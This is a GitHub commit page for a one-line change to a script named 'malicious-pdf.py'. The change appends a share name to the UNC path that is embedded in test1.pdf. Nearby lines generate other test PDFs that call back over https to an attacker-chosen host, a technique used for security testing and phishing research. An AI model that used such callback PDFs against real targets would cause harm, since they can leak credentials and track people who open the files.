Skip to content

Commit

Permalink
added share name to test1
Browse files Browse the repository at this point in the history
  • Loading branch information
captain-woof authored Apr 24, 2024
1 parent 93ee1f5 commit 2a9d49a
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion malicious-pdf.py
Original file line number Diff line number Diff line change
Expand Up @@ -619,7 +619,7 @@ def create_malpdf(filename, host):

print("[+] Creating PDF files..")

create_malpdf("test1.pdf", '\\\\' + '\\\\' + host + '\\\\' )
create_malpdf("test1.pdf", '\\\\' + '\\\\' + host + '\\\\' + 'test')
create_malpdf("test1bis.pdf", 'https://' + host)
create_malpdf2("test2.pdf", 'https://' + host)
create_malpdf3("test3.pdf", 'https://' + host)
Expand Down

0 comments on commit 2a9d49a

Please sign in to comment.